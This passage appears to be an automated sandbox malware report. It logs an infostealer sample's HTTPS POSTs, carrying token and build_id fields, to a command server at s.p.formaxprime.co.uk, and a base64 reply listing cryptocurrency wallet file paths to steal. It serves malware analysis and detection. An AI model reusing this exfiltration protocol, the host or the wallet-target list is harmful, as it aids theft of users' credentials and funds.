                                                                                            Content-Length: 6990993
                                                                                            Connection: Keep-Alive
                                                                                            Cache-Control: no-cache
                                                                                            2025-03-13 13:50:28 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 34 6f 68 34 77 74 32 6e 6f 7a 6d 67 76 33 6f 38 79 35 70 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 65 61 37 64 34 36 64 30 33 32 66 38 36 33 36 36 34 62 38 32 37 36 66 65 64 32 39 64 38 66 0d 0a 2d 2d 2d 2d 2d 2d 34 6f 68 34 77 74 32 6e 6f 7a 6d 67 76 33 6f 38 79 35 70 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 64 35 64 34 34 64 35 36 36 34 32 34 61 38 62 35 64 31 37 35 61 32 30 38 61 31 64 38 36 31 66 0d 0a 2d 2d 2d 2d 2d 2d 34 6f 68 34 77 74 32 6e 6f 7a 6d 67 76 33 6f 38 79 35 70 70 0d 0a 43 6f 6e 74
                                                                                            Data Ascii: ------4oh4wt2nozmgv3o8y5ppContent-Disposition: form-data; name="token"62ea7d46d032f863664b8276fed29d8f------4oh4wt2nozmgv3o8y5ppContent-Disposition: form-data; name="build_id"5d5d44d566424a8b5d175a208a1d861f------4oh4wt2nozmgv3o8y5ppCont
                                                                                            2025-03-13 13:50:28 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:28 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:28 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:28 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:28 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:28 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:28 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:28 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:28 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:36 UTC158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Thu, 13 Mar 2025 13:50:36 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            23192.168.2.44977078.47.63.1324437304C:\Users\user\Desktop\ngbtiladkrthgad.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-03-13 13:50:29 UTC271OUTPOST / HTTP/1.1
                                                                                            Content-Type: multipart/form-data; boundary=----y5phvai5f3ekf37qqqi5
                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0
                                                                                            Host: s.p.formaxprime.co.uk
                                                                                            Content-Length: 331
                                                                                            Connection: Keep-Alive
                                                                                            Cache-Control: no-cache
                                                                                            2025-03-13 13:50:29 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 79 35 70 68 76 61 69 35 66 33 65 6b 66 33 37 71 71 71 69 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 65 61 37 64 34 36 64 30 33 32 66 38 36 33 36 36 34 62 38 32 37 36 66 65 64 32 39 64 38 66 0d 0a 2d 2d 2d 2d 2d 2d 79 35 70 68 76 61 69 35 66 33 65 6b 66 33 37 71 71 71 69 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 64 35 64 34 34 64 35 36 36 34 32 34 61 38 62 35 64 31 37 35 61 32 30 38 61 31 64 38 36 31 66 0d 0a 2d 2d 2d 2d 2d 2d 79 35 70 68 76 61 69 35 66 33 65 6b 66 33 37 71 71 71 69 35 0d 0a 43 6f 6e 74
                                                                                            Data Ascii: ------y5phvai5f3ekf37qqqi5Content-Disposition: form-data; name="token"62ea7d46d032f863664b8276fed29d8f------y5phvai5f3ekf37qqqi5Content-Disposition: form-data; name="build_id"5d5d44d566424a8b5d175a208a1d861f------y5phvai5f3ekf37qqqi5Cont
                                                                                            2025-03-13 13:50:30 UTC158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Thu, 13 Mar 2025 13:50:30 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            2025-03-13 13:50:30 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                            Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            24192.168.2.44977278.47.63.1324437304C:\Users\user\Desktop\ngbtiladkrthgad.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-03-13 13:50:39 UTC271OUTPOST / HTTP/1.1
                                                                                            Content-Type: multipart/form-data; boundary=----16fkxtri58yu379z5pz5
                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0
                                                                                            Host: s.p.formaxprime.co.uk
                                                                                            Content-Length: 453
                                                                                            Connection: Keep-Alive
                                                                                            Cache-Control: no-cache
                                                                                            2025-03-13 13:50:39 UTC453OUTData Raw: 2d 2d 2d 2d 2d 2d 31 36 66 6b 78 74 72 69 35 38 79 75 33 37 39 7a 35 70 7a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 65 61 37 64 34 36 64 30 33 32 66 38 36 33 36 36 34 62 38 32 37 36 66 65 64 32 39 64 38 66 0d 0a 2d 2d 2d 2d 2d 2d 31 36 66 6b 78 74 72 69 35 38 79 75 33 37 39 7a 35 70 7a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 64 35 64 34 34 64 35 36 36 34 32 34 61 38 62 35 64 31 37 35 61 32 30 38 61 31 64 38 36 31 66 0d 0a 2d 2d 2d 2d 2d 2d 31 36 66 6b 78 74 72 69 35 38 79 75 33 37 39 7a 35 70 7a 35 0d 0a 43 6f 6e 74
                                                                                            Data Ascii: ------16fkxtri58yu379z5pz5Content-Disposition: form-data; name="token"62ea7d46d032f863664b8276fed29d8f------16fkxtri58yu379z5pz5Content-Disposition: form-data; name="build_id"5d5d44d566424a8b5d175a208a1d861f------16fkxtri58yu379z5pz5Cont
                                                                                            2025-03-13 13:50:40 UTC158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Thu, 13 Mar 2025 13:50:40 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            2025-03-13 13:50:40 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 2ok0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            25192.168.2.44977478.47.63.1324437304C:\Users\user\Desktop\ngbtiladkrthgad.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-03-13 13:50:43 UTC274OUTPOST / HTTP/1.1
                                                                                            Content-Type: multipart/form-data; boundary=----sjwt0hlfuk68yukn7gd2
                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0
                                                                                            Host: s.p.formaxprime.co.uk
                                                                                            Content-Length: 114677
                                                                                            Connection: Keep-Alive
                                                                                            Cache-Control: no-cache
                                                                                            2025-03-13 13:50:43 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 73 6a 77 74 30 68 6c 66 75 6b 36 38 79 75 6b 6e 37 67 64 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 65 61 37 64 34 36 64 30 33 32 66 38 36 33 36 36 34 62 38 32 37 36 66 65 64 32 39 64 38 66 0d 0a 2d 2d 2d 2d 2d 2d 73 6a 77 74 30 68 6c 66 75 6b 36 38 79 75 6b 6e 37 67 64 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 64 35 64 34 34 64 35 36 36 34 32 34 61 38 62 35 64 31 37 35 61 32 30 38 61 31 64 38 36 31 66 0d 0a 2d 2d 2d 2d 2d 2d 73 6a 77 74 30 68 6c 66 75 6b 36 38 79 75 6b 6e 37 67 64 32 0d 0a 43 6f 6e 74
                                                                                            Data Ascii: ------sjwt0hlfuk68yukn7gd2Content-Disposition: form-data; name="token"62ea7d46d032f863664b8276fed29d8f------sjwt0hlfuk68yukn7gd2Content-Disposition: form-data; name="build_id"5d5d44d566424a8b5d175a208a1d861f------sjwt0hlfuk68yukn7gd2Cont
                                                                                            2025-03-13 13:50:43 UTC16355OUTData Raw: 38 56 77 6e 6a 66 2f 6b 62 62 7a 36 52 2f 2b 67 4c 57 6d 41 6c 48 36 78 47 45 58 64 4a 50 55 35 63 32 6a 4c 36 70 4b 63 6c 5a 74 72 51 35 36 6b 70 61 4b 2b 68 50 6b 68 4b 4b 57 6b 70 67 61 6e 68 76 2f 6b 5a 64 4e 2f 36 2b 45 2f 6e 58 65 32 45 67 73 2f 69 58 71 30 4d 33 79 74 66 57 30 55 73 42 50 38 51 52 64 70 48 31 34 50 35 56 77 58 68 7a 2f 6b 5a 64 4e 2f 36 2b 55 2f 6e 58 71 48 69 48 77 2f 48 72 6b 45 54 4a 4d 31 74 66 57 37 62 37 65 35 54 71 68 2f 71 44 58 67 5a 6c 4f 4b 78 50 4c 4c 61 55 62 66 6a 66 39 44 36 6e 4a 6f 79 65 46 35 6f 37 78 6c 66 38 45 76 31 4f 51 31 6e 52 74 61 30 37 78 4a 71 6c 35 61 61 52 46 71 63 47 6f 78 6c 56 5a 77 47 4d 52 49 35 34 37 66 38 41 36 71 33 64 46 74 48 38 4b 65 41 35 42 71 4c 4b 72 78 52 79 53 75 6f 50 33 53 65 69 35
                                                                                            Data Ascii: 8Vwnjf/kbbz6R/+gLWmAlH6xGEXdJPU5c2jL6pKclZtrQ56kpaK+hPkhKKWkpganhv/kZdN/6+E/nXe2Egs/iXq0M3ytfW0UsBP8QRdpH14P5VwXhz/kZdN/6+U/nXqHiHw/HrkETJM1tfW7b7e5Tqh/qDXgZlOKxPLLaUbfjf9D6nJoyeF5o7xlf8Ev1OQ1nRta07xJql5aaRFqcGoxlVZwGMRI547f8A6q3dFtH8KeA5BqLKrxRySuoP3Sei5
                                                                                            2025-03-13 13:50:43 UTC16355OUTData Raw: 4e 52 63 62 4c 31 50 43 72 78 6f 74 4f 63 5a 33 66 70 2f 77 53 77 6a 58 50 6e 68 4c 5a 72 52 57 64 53 58 6b 75 6f 45 6c 53 4a 42 79 7a 6b 4f 70 41 41 41 4a 72 4f 67 31 6a 2b 32 4e 61 53 34 57 78 74 6f 62 4e 39 63 30 32 31 67 51 51 49 75 36 42 76 4e 44 62 67 41 42 6c 39 6f 4c 63 59 37 64 41 4b 75 79 4e 64 71 73 69 32 72 32 34 57 5a 50 4c 6c 57 65 32 6a 6d 56 31 79 44 67 68 31 59 59 79 42 32 37 43 73 2b 35 73 74 51 6d 6e 68 6c 69 75 4c 61 31 61 4b 61 47 34 55 57 39 72 46 47 76 6d 52 62 74 6a 62 56 51 44 6a 65 33 62 6e 50 4f 63 43 75 4c 47 59 61 76 55 71 63 30 46 70 70 2b 61 76 2b 42 36 57 58 59 7a 44 55 61 50 4c 56 65 72 76 30 32 37 44 70 64 55 75 2f 74 75 6c 77 54 57 6d 6d 33 65 6f 53 58 6b 30 55 73 47 6e 47 46 6c 4e 75 78 56 55 42 4d 58 79 43 54 4a 63 6a
                                                                                            Data Ascii: NRcbL1PCrxotOcZ3fp/wSwjXPnhLZrRWdSXkuoElSJByzkOpAAAJrOg1j+2NaS4WxtobN9c021gQQIu6BvNDbgABl9oLcY7dAKuyNdqsi2r24WZPLlWe2jmV1yDgh1YYyB27Cs+5stQmnhliuLa1aKaG4UW9rFGvmRbtjbVQDje3bnPOcCuLGYavUqc0Fpp+av+B6WXYzDUaPLVerv027DpdUu/tulwTWmm3eoSXk0UsGnGFlNuxVUBMXyCTJcj
